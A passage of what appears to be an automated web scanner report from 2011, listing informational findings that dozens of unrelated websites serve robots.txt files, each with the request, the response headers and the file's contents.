Disallow: /link_rand.php
Disallow: /terms.php
Disallow: /music
Disallow: /dmca.php
Disallow: /privacy.php

User-agent: e-SocietyRobot/*
User-agent: giga
...[SNIP]...

26.649. http://www.magellans.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.magellans.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.magellans.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:16:41 GMT
Server: Apache
Last-Modified: Tue, 21 Sep 2010 20:08:26 GMT
ETag: "dc-4c9910ba"
Accept-Ranges: bytes
Content-Length: 220
Connection: close
Content-Type: text/plain

Sitemap: http://www.magellans.com/sitemap.xml
Sitemap: http://www.magellans.com/videoSitemap.xml
User-agent: *
Disallow: /*refprod
Disallow: /*refchan
Disallow: /*cgi.bin
Disallow: /*Partner_ID
Disall
...[SNIP]...

26.650. http://www.make-life-easier.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.make-life-easier.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.make-life-easier.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:20:00 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8k DAV/2 Resin/3.0.14
Last-Modified: Thu, 25 Jun 2009 16:14:08 GMT
ETag: "1741c2-73-46d2e83713400"
Accept-Ranges: bytes
Content-Length: 115
Cache-Control: max-age=2419200
Expires: Tue, 31 May 2011 11:20:00 GMT
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1
Set-Cookie: NSC_nblf-mjgf-fbtjfs_80=ffffffff09c9397e45525d5f4f58455e445a4a423660;expires=Tue, 03-May-2011 11:13:10 GMT;path=/

User-agent: *
Disallow: /admin/
Disallow: /util/
Disallow: /account/
Disallow: http://starcrest.marketlive.com/

26.651. http://www.makefive.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.makefive.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.makefive.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:12:41 GMT
Server: Apache/2.2.11 (Ubuntu)
Last-Modified: Sun, 10 Apr 2011 22:26:39 GMT
ETag: "24a7e-ea-4a097f3e1a5c0"
Accept-Ranges: bytes
Content-Length: 234
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Allow: /
Disallow: /categories/*/*/*/nominees
Disallow: /categories/*/*/*/selections
Disallow: /categories/*/*/*/comments
Disallow: /categories/*/*/*/voters
Disallow: /search*
Dis
...[SNIP]...

26.652. http://www.manchester2002-uk.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.manchester2002-uk.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.manchester2002-uk.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 18:59:29 GMT
Server: Apache/1.3.20 Sun Cobalt (Unix) mod_ssl/2.8.4 OpenSSL/0.9.6b PHP/4.1.2 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.25
Last-Modified: Thu, 05 Nov 2009 11:35:39 GMT
ETag: "80146-364-4af2b88b"
Accept-Ranges: bytes
Content-Length: 868
Connection: close
Content-Type: text/plain

# PARTIAL access (All Spiders)
User-agent: *
Disallow: /1-white/
Disallow: /_notes/
Disallow: /about2.htm
Disallow: /advertise.html
Disallow: /award-list.html
Disallow: /awards-prog/
Disall
...[SNIP]...

26.653. http://www.manchesterairport.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.manchesterairport.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.manchesterairport.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:21:04 GMT
Server: Apache
Last-Modified: Thu, 23 Apr 2009 05:09:16 GMT
ETag: "32df16e-88-46831e1b0f700"
Accept-Ranges: bytes
Content-Length: 136
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /cpx.php
Disallow: /medios1.php
Disallow: /toolbar.php
Disallow: /check_image.php
Disallow: /check_popunder.php

26.654. http://www.mangahead.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mangahead.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mangahead.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:36:18 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 28 Jun 2010 11:40:00 GMT
ETag: "bf2058b-b4-48a1594aaa400"
Accept-Ranges: bytes
Content-Length: 180
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Mediapartners-Google
Allow: *?action=*
User-agent: Adsbot-Google
Allow: *?action=*
User-agent: *
Disallow: *?action=*
Disallow: /mangas/*
Disallow: /index.php/*

26.655. http://www.manhattanapts.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.manhattanapts.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.manhattanapts.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:48:09 GMT
Server: Apache/1.3.41 Ben-SSL/1.59 (Unix) mod_perl/1.30 PHP/4.0.3pl1
Last-Modified: Fri, 08 May 2009 20:24:20 GMT
ETag: "189a6b9-6cd-4a0494f4"
Accept-Ranges: bytes
Content-Length: 1741
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /202/rsd/
Disallow: /agent/
Disallow: /agentspage/
Disallow: /allforms/
Disallow: /application/
Disallow: /autoresponse/
Disallow: /biotemplate/
Disallow: /commons/
Disallow: /
...[SNIP]...

26.656. http://www.maniactools.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.maniactools.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.maniactools.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:52:50 GMT
Server: Apache/2.2.17
Last-Modified: Wed, 19 Mar 2003 17:56:44 GMT
ETag: "6ad644-30-3b93d01c58f00"
Accept-Ranges: bytes
Content-Length: 48
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /
Disallow: /cgi-bin/

26.657. http://www.manufacturersclearance.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.manufacturersclearance.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.manufacturersclearance.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:20:56 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Cache-Control: max-age=3600, private
Expires: Tue, 03 May 2011 12:20:56 GMT
Last-Modified: Tue, 19 Apr 2011 05:05:22 GMT
Accept-Ranges: bytes
Content-Length: 344
Connection: close
Content-Type: text/plain

User-agent: *
# Cap is html
Disallow: /cgi-bin/
Disallow: /RT/
Disallow: /TG/
Disallow: /QS/
Disallow: /wgl/
Disallow: /P/
Disallow: /ymix/
Disallow: /OS/
Disallow: /cs/
Disallow: /en=
Disallow: /p/s=
...[SNIP]...

26.658. http://www.mapmyfitness.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mapmyfitness.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mapmyfitness.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Tue, 03 May 2011 11:29:55 GMT
Content-Type: text/plain
Content-Length: 56
Last-Modified: Thu, 06 Jan 2011 00:04:28 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

User-agent: *
Sitemap: /sitemap.xml

Disallow: /admin/

26.659. http://www.maps-gps-info.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.maps-gps-info.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.maps-gps-info.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:42:48 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.maps-gps-info.com/rFqr1jlp.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow: /dyn/
D
...[SNIP]...

26.660. http://www.marinepartsplus.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marinepartsplus.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.marinepartsplus.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:43:48 GMT
Server: Apache/2.2.17
Last-Modified: Thu, 01 May 2008 14:57:26 GMT
ETag: "5e-44c2c7bcac180"
Accept-Ranges: bytes
Content-Length: 94
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /catalog/partsearch.html
Disallow: /catalog/cart.html
Disallow: *.pdf

26.661. http://www.marioncountyfl.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marioncountyfl.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.marioncountyfl.org

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 3798
Date: Tue, 03 May 2011 11:19:51 GMT
Content-Type: text/plain
ETag: "W/"64ce4-6f37afdac912e1d""
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Last-Modified: Thu, 21 May 2009 12:27:17 GMT
Accept-Ranges: bytes
X-Powered-By:Servlet/2.4

User-agent: *
Disallow: /_borders/
Disallow: /_private/
Disallow: /_themes/
Disallow: /css/
Disallow: /js/
Disallow: /search/
Disallow: /Sitemaps/
Disallow: /misc/
Disallow: /email_forms/
D
...[SNIP]...

26.662. http://www.market4free.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.market4free.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.market4free.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Expires: Sun, 29 Mar 2020 00:00:00 GMT
Last-Modified: Sun, 06 Feb 2011 14:50:37 GMT
Accept-Ranges: bytes
ETag: "84fa6637dc6cb1:0"
Server: Microsoft-IIS/7.0
Date: Tue, 03 May 2011 10:39:16 GMT
Connection: close
Content-Length: 430

...User-agent: *
Disallow: /Images/
Disallow: /Services/
Disallow: /Resources/
Disallow: /Error.aspx
Disallow: *.asmx
Disallow: *.ashx
Disallow: *.axd
Disallow: /classified_ads/
Disallow: /cl
...[SNIP]...

26.663. http://www.marshu.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marshu.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.marshu.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:34:04 GMT
Server: Apache
Last-Modified: Sun, 20 Feb 2011 15:00:47 GMT
ETag: "2837d6-70-4d612c9f"
Accept-Ranges: bytes
Content-Length: 112
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /stats/
Disallow: /statshistory/
Disallow: /images/
Disallow: /gallery/
Disallow: /cgi/

26.664. http://www.mashceleb.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mashceleb.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mashceleb.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 03 May 2011 10:28:36 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
Last-Modified: Sun, 30 Jan 2011 14:23:34 GMT
Accept-Ranges: bytes
Content-Length: 426
Cache-Control: max-age=86400
Expires: Wed, 04 May 2011 10:28:12 GMT
Vary: Accept-Encoding

Sitemap: http://www.mashceleb.com/sitemap.xml

User-agent: *
Disallow: */trackback*
Disallow: */comment-page*
Disallow: /*.js
Disallow: /*.php
Disallow: /*.css
Disallow: /go/
Disallow: /login
...[SNIP]...

26.665. http://www.masonite.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.masonite.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.masonite.com

Response

HTTP/1.1 200 OK
Content-Length: 273
Content-Type: text/plain
Last-Modified: Tue, 26 Apr 2011 20:39:47 GMT
Accept-Ranges: bytes
ETag: "56793815524cc1:1bca"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:57:12 GMT
Connection: close

User-Agent: *
Disallow: /order_catalog.php
Disallow: /contact.php
Disallow: /privacy.php
Disallow: /sandbox/
Disallow: /specialty/
Disallow: /tools/
Disallow: /email/
Disallow: /oe/
Disallow:
...[SNIP]...

26.666. http://www.masseyferguson.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.masseyferguson.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.masseyferguson.com

Response

HTTP/1.0 200 OK
Content-Length: 2668
Content-Type: text/plain
Last-Modified: Thu, 09 Jul 2009 08:21:30 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: max-age=53995
Date: Tue, 03 May 2011 11:37:28 GMT
Connection: close

User-agent: *
Disallow: /%5B%5E/%5D*$
Disallow: /%5D
Disallow: /1600
Disallow: /8690
Disallow: /bin/
Disallow: /controls/
Disallow: /static/asp/
Disallow: /static/documents/
Disallow: /static
...[SNIP]...

26.667. http://www.maxdome.de/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.maxdome.de
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.maxdome.de

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:13:21 GMT
Server: Apache
Last-Modified: Wed, 20 Apr 2011 15:01:32 GMT
ETag: "38e433-2a-4a15ae66eeb00"
Accept-Ranges: bytes
Content-Length: 42
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /css/noscript.css

26.668. http://www.maxrules.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.maxrules.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.maxrules.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:14:32 GMT
Server: Apache
Last-Modified: Wed, 06 Apr 2011 10:36:11 GMT
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.669. http://www.maysville-online.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.maysville-online.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.maysville-online.com

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=900
X-TNCMS-Memory-Usage: 2046064
Content-Type: text/plain; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 10:36:51 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0343
Accept-Ranges: bytes
X-PHP-Engine: enabled
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp2
Content-Length: 1685
Connection: close
X-Cache-Info: cached

User-agent: MSNBot
Crawl-delay: 3
Disallow: /content/tncms/live/
Disallow: /content/tncms/ads/
Disallow: /search/?
Disallow: /*?mode=print
Disallow: /*?print
Disallow: /*?mode=story
Disallow:
...[SNIP]...

26.670. http://www.mbrgames.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mbrgames.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mbrgames.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:44:12 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 21 Mar 2011 02:16:45 GMT
ETag: "6dc000b-cc-49ef4b81d9d40"
Accept-Ranges: bytes
Content-Length: 204
Connection: close
Content-Type: text/plain; charset=UTF-8

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

26.671. http://www.mcc.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mcc.edu
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mcc.edu

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:11:37 GMT
Server: Apache/2.0.46 (Red Hat)
Last-Modified: Fri, 12 Nov 2010 18:46:09 GMT
ETag: "4c02d-429-80f4fe40"
Accept-Ranges: bytes
Content-Length: 1065
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *

Disallow: /cgi-bin/
Disallow: /cgi-bin/deptcontacts.cgi
Disallow: /cgi-bin/alphcontacts.cgi
Disallow: /cgi-bin/departments.cgi
Disallow: /cgi-bin/dirsearch.cgi
Disallow: /indexmain47.sh
...[SNIP]...

26.672. http://www.mdausa.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mdausa.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mdausa.org

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: text/plain
Date: Tue, 03 May 2011 10:58:19 GMT
Accept-Ranges: bytes
ETag: "5a36c35c463acb1:0"
Connection: close
Last-Modified: Thu, 12 Aug 2010 17:46:58 GMT
X-Powered-By: ASP.NET
Content-Length: 240

# robots.txt file created at http://www.searchenginepromotionhelp.com/
# Thu, 12 Aug 2010 17:28:15 +0000

# Exclude Files From All Robots:

User-agent: *
Disallow: /http://www.mda.org/news/Makea
...[SNIP]...

26.673. http://www.medcitynews.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.medcitynews.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.medcitynews.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2
Vary: User-Agent,Accept-Encoding
Content-Type: text/plain; charset=utf-8
Date: Tue, 03 May 2011 11:04:46 GMT
X-Pingback: http://www.medcitynews.com/wordpress/xmlrpc.php
Connection: close
Set-Cookie: X-Mapping-ldogmccn=05D07D54A79C0EF999D024F0C5C7BA35; path=/
X-Powered-By: W3 Total Cache/0.9.1.3
Content-Length: 76

User-agent: *
Disallow:

Sitemap: http://www.medcitynews.com/sitemap.xml.gz

26.674. http://www.mediatico.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mediatico.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mediatico.com

Response

HTTP/1.1 200 OK
Content-Length: 86
Content-Type: text/plain
Last-Modified: Mon, 16 Oct 2006 15:34:52 GMT
Accept-Ranges: bytes
ETag: "f850ae9f38f1c61:5897"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:12:45 GMT
Connection: close

#
# robots.txt file
#
User-agent: *
Disallow: /es/iframe
Disallow: /es/search

26.675. http://www.menalto.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.menalto.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.menalto.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:33:50 GMT
Server: Apache
Last-Modified: Mon, 25 Oct 2010 03:45:14 GMT
ETag: "2ae74-35-49368d1e26680"
Accept-Ranges: bytes
Content-Length: 53
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /photos/digibug/print_photo/

26.676. http://www.methodisthealth.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.methodisthealth.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.methodisthealth.org

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 22 Jul 2009 19:52:05 GMT
Accept-Ranges: bytes
ETag: "54516de35bca1:1e1f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:24:27 GMT
Content-Type: text/plain
Content-Length: 29
Via: 1.0 www.methodisthealth.org (Access Gateway 3.0.4-94)

User-Agent: *
Allow: /

26.677. http://www.metrodate.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.metrodate.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.metrodate.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Content-Type: text/plain
Last-Modified: Fri, 11 Dec 2009 16:15:46 GMT
Accept-Ranges: bytes
ETag: "5de73a327d7aca1:0"
Server: Microsoft-IIS/7.5
Date: Tue, 03 May 2011 10:59:50 GMT
Connection: close
Content-Length: 173

User-agent: *
Disallow: /joindisclaimer.asp
Disallow: /asp/lostpassword.asp
Disallow: /asp/resetpassword.aspx
Disallow: /privacypolicy.asp
Disallow: /joindisclaimer.asp

26.678. http://www.mgexperience.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mgexperience.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mgexperience.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:47:59 GMT
Server: Apache/2.0.63 (FreeBSD) PHP/5.3.3 with Suhosin-Patch
Last-Modified: Sun, 24 Apr 2011 23:08:30 GMT
ETag: "702a71-24a-2b53b780"
Accept-Ranges: bytes
Content-Length: 586
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /ads/click.php
Disallow: /article_add.php
Disallow: /library/add.php
Disallow: /blackhole.html
Disallow: /calendar/add.php
Disallow: /calendar/attend.php
Disallow: /garage_add.
...[SNIP]...

26.679. http://www.michiguide.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.michiguide.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.michiguide.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:06:14 GMT
Server: Apache
Last-Modified: Sat, 16 Jan 2010 21:20:48 GMT
ETag: "752c16b-19c-4b522db0"
Accept-Ranges: bytes
Content-Length: 412
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin
Disallow: /config
Disallow: /stats
Disallow: /mt4-static
Disallow: /shop/ads
Disallow: /weather/img
Disallow: /weather/cache
Disallow: /weather/configs
Disallow: /we
...[SNIP]...

26.680. http://www.midlandstech.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.midlandstech.edu
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.midlandstech.edu

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:10:30 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Wed, 18 Oct 2006 16:11:10 GMT
ETag: "25aad6d0f2c61:11d2"
Content-Length: 265

User-agent: *
Disallow: /ctest/
Disallow: /test/
Disallow: /conted/test/
Disallow: /ce/
Disallow: /bookstoretest/
Disallow: /insidebookstoretest/
Disallow: /edu/ed/ism/kinnie/bcistadvisement200
...[SNIP]...

26.681. http://www.midmich.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.midmich.edu
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.midmich.edu

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:16:41 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7l DAV/2 PHP/5.2.5 SVN/1.4.4
Last-Modified: Fri, 03 Oct 2008 14:32:54 GMT
ETag: "2dc8f4-90-4585a3574f180"
Accept-Ranges: bytes
Content-Length: 144
MS-Author-Via: DAV
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /intranetshare.php
Disallow: /scripts.php
Disallow: /files/
Allow: /intranet.php
Allow: /
Disallow: /share.php

26.682. http://www.miindia.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.miindia.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.miindia.com

Response

HTTP/1.1 200 OK
Content-Length: 79
Content-Type: text/plain
Last-Modified: Tue, 20 Nov 2007 04:40:39 GMT
Accept-Ranges: bytes
ETag: "3b217802f2bc81:2de"
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:42:58 GMT
Connection: close

User-agent: *
Disallow: /cgi-bin/
Disallow: /secure/
Disallow: /images/

26.683. http://www.millionlooks.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millionlooks.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.millionlooks.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 03 May 2011 10:25:53 GMT
Content-Type: text/html; charset="UTF-8"
Connection: close
Vary: Cookie
X-Pingback: http://www.millionlooks.com/xmlrpc.php
Set-Cookie: PHPSESSID=3774c9d64c203dd1a1e348d8986c6f27; path=/

User-agent: *
Disallow:

26.684. http://www.mis-recetas.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mis-recetas.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mis-recetas.org

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Tue, 03 May 2011 11:02:49 GMT
Content-Type: text/plain
Content-Length: 346
Last-Modified: Fri, 15 Apr 2011 08:24:35 GMT
Connection: close
Accept-Ranges: bytes

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file

User-Agent: *
Allow: /
Disallow: /vinos/insertar
Disallow: /recomendar/enviar_receta
Disallow: /rep
...[SNIP]...

26.685. http://www.missionmenus.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.missionmenus.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.missionmenus.com

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: text/plain
Last-Modified: Fri, 08 Oct 2010 12:07:21 GMT
Accept-Ranges: bytes
ETag: "6ebaa15ce166cb1:f00"
Server: Microsoft-IIS/6.0
WebServer: Web4
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 09:05:36 GMT
Connection: close

User-agent: *
Disallow: /backtoschoolcoupon
Disallow: /coupon

26.686. http://www.mitchellrepublic.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mitchellrepublic.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mitchellrepublic.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 12 Jan 2010 21:15:28 GMT
ETag: "3d9676e-27-47cfe27327c00"
Accept-Ranges: bytes
Content-Length: 39
Content-Type: text/plain; charset=UTF-8
X-Cache-Lookup: HIT from sc2.fccinteractive.com:80
Date: Tue, 03 May 2011 10:54:10 GMT
Connection: close

User-agent: *\
Disallow:/event/search/

26.687. http://www.mlsli.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mlsli.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mlsli.com

Response

HTTP/1.1 200 OK
Content-Length: 33
Content-Type: text/plain
Content-Location: http://www.mlsli.com/robots.txt
Last-Modified: Mon, 04 Apr 2011 20:38:03 GMT
Accept-Ranges: bytes
ETag: "b8cee318f3cb1:b384"
Server: Microsoft-IIS/6.0
